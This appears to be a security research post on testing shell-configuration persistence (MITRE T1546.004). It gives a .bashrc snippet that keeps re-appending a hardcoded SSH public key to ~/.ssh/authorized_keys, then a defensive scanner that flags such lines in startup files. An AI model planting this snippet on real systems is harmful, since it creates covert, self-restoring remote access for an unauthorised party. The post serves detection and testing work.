As I was researching how "Unix Shell Configuration Modification" could be tested in a .bashrc file, I created the following bash commands that could be used. They loop through the .ssh/authorized_keys file, reading each line. A SHA-256 checksum is computed for each line and compared with the checksum of the SSH key that you wish to insert. If the key does not exist, it is inserted; if it does exist, nothing is done.
    exists="False"
    while read l; do
        checksum=`echo "$l" | sha256sum | awk '{print $1}'`
        # For troubleshooting uncomment the following line to verify the checksum of the line in ~/.ssh/authorized_keys
        # echo $checksum
        # Substitute the checksum for the ssh-key that you want to be reintroduced to the authorized_keys file...
        if [ "$checksum" == "333459f693d01b41c0083bf8dc25ad51e08adf4a9474a3fb34198e3967d53bd4" ]; then
            exists="True"
        fi
    done < ~/.ssh/authorized_keys
    if [ "$exists" == "False" ]; then
        # Verify the ssh-key that you are using is placed below...
        echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCxGaIRqqBKzYJE+0atqKP9u/NCEElmevLyzdkPUYWHxZo16j8OykIfytbCDCagGobdCq4BOEQ48AoyecvFSG+G4NQib4iDDQMzp4+2b5Rs9LpAZgFAaU5BN2MIh7JNk6zWZ23Z5lOse4AembbyFsR0bQvfFSd1XzagUrmkH/Tg4EPgneieYyTp4vk2shvLWVxabZljsKd4hvV3Ei2xcCPU6nAqVoYNOAdUAI9HNkCf3ZDJU/zcm4MjGjCEoww0Krvuy9NuT2JIKdnk2OZHtKU4glIRLOQl3cI0AZaq6IF5VYsniVy+Ag6hVsLfEb7ByJIVlYkvgsW0POjfqLYezGd1Cwz5BKiTJUsCTt/GRhOgpAEkRVhY6TuMr/wgnyUMWxvSsiiLVahU4zvwyJsf8FD5vEhjc4yq+uwB7GX38fVam19LLRcF3OzHm3+mOxZRXjctnq5S6AQMRdTzHzC1tsj0= invalid@key" >> ~/.ssh/authorized_keys
    fi
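A defender-side check for the pattern above, added here as an example and not part of the original post: it flags lines in per-user bash startup files that reference or write to authorized_keys, or that embed SSH public-key material. The function names, reason labels and the sample .bashrc (with a shortened placeholder key) are constructed for illustration.

```shell
#!/bin/sh
# Added example: heuristic triage of shell startup files, not a shell parser.
# Any '>' appearing before "authorized_keys" on a line is treated as a write.

# scan_rc_file FILE -> prints "FILE:LINE:REASONS" for each suspicious line.
scan_rc_file() {
    _f=$1; _n=0
    [ -r "$_f" ] || return 0
    while IFS= read -r _line || [ -n "$_line" ]; do
        _n=$((_n + 1)); _r=
        _t=${_line#"${_line%%[![:space:]]*}"}   # strip leading whitespace
        case $_t in '#'*) continue ;; esac      # full-line comments never execute
        case $_t in
            *'>'*authorized_keys*) _r=write ;;
            *authorized_keys*)     _r=reference ;;
        esac
        case $_t in
            *'ssh-rsa AAAA'*|*'ssh-ed25519 AAAA'*|*'ecdsa-sha2-nistp'*' AAAA'*)
                _r="${_r:+$_r,}embedded-key" ;;
        esac
        if [ -n "$_r" ]; then printf '%s:%s:%s\n' "$_f" "$_n" "$_r"; fi
    done < "$_f"
    return 0
}

# scan_home DIR -> run scan_rc_file over the per-user bash startup files.
scan_home() {
    for _name in .bashrc .bash_profile .bash_login .profile .bash_logout; do
        scan_rc_file "$1/$_name"
    done
}

# Constructed sample .bashrc mirroring the pattern in the post (key shortened).
make_sample_rc() {
    cat > "$1" <<'EOF'
# constructed sample
alias ll='ls -l'
  # authorized_keys is mentioned only in this comment
done < ~/.ssh/authorized_keys
echo "ssh-rsa AAAAEXAMPLE invalid@key" >> ~/.ssh/authorized_keys
export PATH="$HOME/bin:$PATH"
EOF
}

demo_home=$(mktemp -d)
make_sample_rc "$demo_home/.bashrc"
scan_home "$demo_home"
```

A line reported as `write,embedded-key` is the strongest signal, since a startup file has no ordinary reason to append key material to authorized_keys on every login.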
Reference: https://attack.mitre.org/techniques/T1546/004/